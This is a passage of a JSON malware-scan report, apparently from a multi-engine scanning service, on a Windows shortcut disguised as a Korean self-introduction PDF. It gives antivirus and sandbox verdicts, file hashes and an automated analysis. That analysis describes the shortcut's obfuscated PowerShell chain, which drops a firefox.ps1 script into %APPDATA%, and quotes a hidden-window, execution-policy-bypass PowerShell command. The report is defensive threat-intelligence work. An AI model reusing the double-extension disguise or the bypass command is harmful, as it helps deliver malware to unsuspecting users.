"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.243.174",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38566",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26030.3008",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan:Win32/WinLNK.HDA!MTB"
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.23-113519617",
"engine_update": "20260415",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44197AVA:64.31039",
"engine_update": "20260415",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.29.3.10609",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.5.1",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan.Link.Crafted"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-04-15.02",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260415",
"category": "malicious",
"result": "Win32.Trojan.Agent.Kajl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan-JACI!5577FFFB5B5A"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "c3d08f2:c3d08f2:dc6aaa5:dc6aaa5",
"engine_update": "20260415",
"category": "malicious",
"result": "HEUR:Trojan/LNK.Agent.b"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.30.0",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/BZC.YMF"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "failure",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5581",
"engine_update": "20260414",
"category": "failure",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260413-00",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20251216",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260407",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.255",
"engine_update": "20260327",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.769",
"engine_update": "20260413",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260415",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.11.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260410",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260415",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260415",
"category": "type-unsupported",
"result": null
}
},
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 68
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"vhash": "3a3aa9c652cbe087bd436db96feb0618",
"ssdeep": "1536:XmqztgcGChu/Ry9gsNJocZX1JbmfurzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzi:XmqztgcGChu/Ry9gsNJocZX1Jbmfu6",
"total_votes": {
"harmless": 0,
"malicious": 0
},
"type_description": "Windows shortcut",
"filecondis": {
"dhash": "b3a0b49a9092a382",
"raw_md5": "5eaa217aa4ca4c6b9c9061a8c3b9daae"
},
"names": [
"\uc774\uc18c\uc5f0 \uc790\uae30\uc18c\uac1c\uc11c.pdf.lnk"
],
"type_extension": "lnk",
"type_tags": [
"windows",
"lnk"
],
"tlsh": "T1EE251135AACD92401870ED79A2458E6FD86AF7E1A75F70531233CBCC5A0A56BC1A3F31",
"meaningful_name": "\uc774\uc18c\uc5f0 \uc790\uae30\uc18c\uac1c\uc11c.pdf.lnk",
"crowdsourced_ai_results": [
{
"verdict": "malicious",
"category": "code_insight",
"source": "palm",
"analysis": "This LNK file exhibits a highly malicious execution chain characteristic of malware. Although the primary target appears to be a legitimate file (`%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe`), the critical factor is the enormous command-line argument containing obfuscated PowerShell code. This technique (LNK hijacking) is used to disguise the true execution. The script is designed to execute as follows:\n\n1. **LOLBin Abuse:** The script is ultimately executed by `powershell.exe` (a LOLBin).\n2. **Deobfuscation/Decryption:** The arguments contain a massive, whitespace-separated string of numbers (`$VIUSBvejbawf`) which represents encoded data. The PowerShell script then performs a complex calculation involving this data and a key (`be*&fni`) to reconstruct a final payload string (`$qqpvm`). This is a common malware technique for evading static detection.\n3. **Payload Dropping:** The deobfuscated payload (`$qqpvm`) is written to a new file named `firefox.ps1` inside the `%APPDATA%` directory.\n4. **Final Execution:** The script immediately executes this newly dropped PowerShell script using `powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;` to ensure silent execution with relaxed security measures.\n\nKey malicious indicators include the abuse of LNK arguments to hold a multi-stage PowerShell payload, obfuscation via numerical encoding, targeting a user-writable location (`%APPDATA%`) for payload dropping, and the use of the `powershell -windowstyle hidden -ExecutionPolicy Bypass` command.",
"id": "863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1-file-palm"
}
]
}
}
}